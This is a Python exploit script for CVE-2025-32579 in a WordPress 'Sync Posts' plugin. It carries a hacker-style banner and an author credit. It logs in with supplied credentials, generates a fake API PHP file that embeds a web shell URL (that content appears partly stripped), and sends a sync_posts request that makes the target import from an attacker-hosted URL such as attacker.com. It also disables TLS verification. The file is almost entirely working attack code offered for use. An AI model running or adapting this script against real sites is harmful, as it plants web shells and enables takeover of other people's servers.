import argparse import requests import urllib.parse requests.packages.urllib3.disable_warnings() session = requests.Session() session.verify = False user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36" def display_banner(): print(""" @@@ @@@ @@@ @@@ @@@@@@@ @@@ @@@@@@ @@@ @@@@@@@ @@@@@@@@ @@@@@@@ @@@@ @@@ @@@ @@@ @@@@@@@@ @@@ @@@@@@@@ @@@ @@@@@@@ @@@@@@@@ @@@@@@@@ @@!@!@@@ @@! !@@ @@! @@@ @@! @@! @@@ @@! @@! @@! @@! @@@ !@!!@!@! !@! @!! !@! @!@ !@! !@! @!@ !@! !@! !@! !@! @!@ @!@ !!@! !@@!@! @!@@!@! @!! @!@ !@! !!@ @!! @!!!:! @!@ !@! !@! !!! @!!! !!@!!! !!! !@! !!! !!! !!! !!!!!: !@! !!! !!: !!! !: :!! !!: !!: !!: !!! !!: !!: !!: !!: !!! :!: !:! :!: !:! :!: :!: :!: !:! :!: :!: :!: :!: !:! :: :: :: ::: :: :: :::: ::::: :: :: :: :: :::: :::: :: :: : : :: : : :: : : : : : : : : :: :: :: : : """) def login_to_wordpress(url, username, password): login_url = url.rstrip('/') + '/wp-login.php' data = { 'log': username, 'pwd': password, 'rememberme': 'forever', 'wp-submit': 'Log In' } headers = {"User-Agent": user_agent} print("NXPLOITED: Attempting login...") resp = session.post(login_url, data=data, headers=headers) if any('wordpress_logged_in' in c.name for c in session.cookies): print("NXPLOITED: Logged in successfully.") return True else: print("NXPLOITED: Failed to log in.") return False def generate_fake_api(shell_url): return f""" 1, "title" => ["rendered" => "Nxploited"], "content" => [ "rendered" => "

" ] ] ]); ?>""" def send_exploit_request(target_url, website_url): data = { "website_url": website_url, "post_status": "pending", "num_posts": 1, "import_comments": 1, "author": 1, "action": "sync_posts" } headers = { "User-Agent": user_agent, "Accept": "text/html, */*; q=0.01", "Accept-Language": "en-US,en;q=0.5", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "Referer": f"{target_url}/wp-admin/admin.php?page=sync-posts", "Origin": target_url, "Connection": "keep-alive" } print(f"NXPLOITED: Sending exploit request to: {target_url}") try: response = session.post( f"{target_url}/wp-admin/admin-ajax.php", headers=headers, data=urllib.parse.urlencode(data), ) if response.status_code == 200: print("NXPLOITED: Request sent successfully.") print(response.text[:500]) else: print(f"NXPLOITED: Failed to send request. Status: {response.status_code}") print(response.text[:300]) except Exception as e: print(f"NXPLOITED: Error occurred while sending request: {e}") def main(): display_banner() parser = argparse.ArgumentParser(description="Exploit For CVE-2025-32579 Sync Posts # By: Nxploited ( Khaled Alenazi )") parser.add_argument("-u", "--url", required=True, help="Target WordPress URL (e.g., http://target.com/wordpress)") parser.add_argument("-un", "--username", required=True, help="Username to login") parser.add_argument("-p", "--password", required=True, help="Password to login") parser.add_argument("-ws", "--website", required=True, help="URL to fake API (e.g., http://attacker.com/Khaled_alenazi.php)") parser.add_argument("-shell", "--webshell", required=True, help="Web shell URL used inside the fake API (can be a test image)") args = parser.parse_args() php_api_content = generate_fake_api(args.webshell) with open("Khaled_alenazi.php", "w") as f: f.write(php_api_content) print("NXPLOITED: Generated fake API PHP file: Khaled_alenazi.php") if login_to_wordpress(args.url, args.username, args.password): send_exploit_request(args.url, args.website) else: print("NXPLOITED: Exploit aborted due to failed login.") if __name__ == "__main__": main()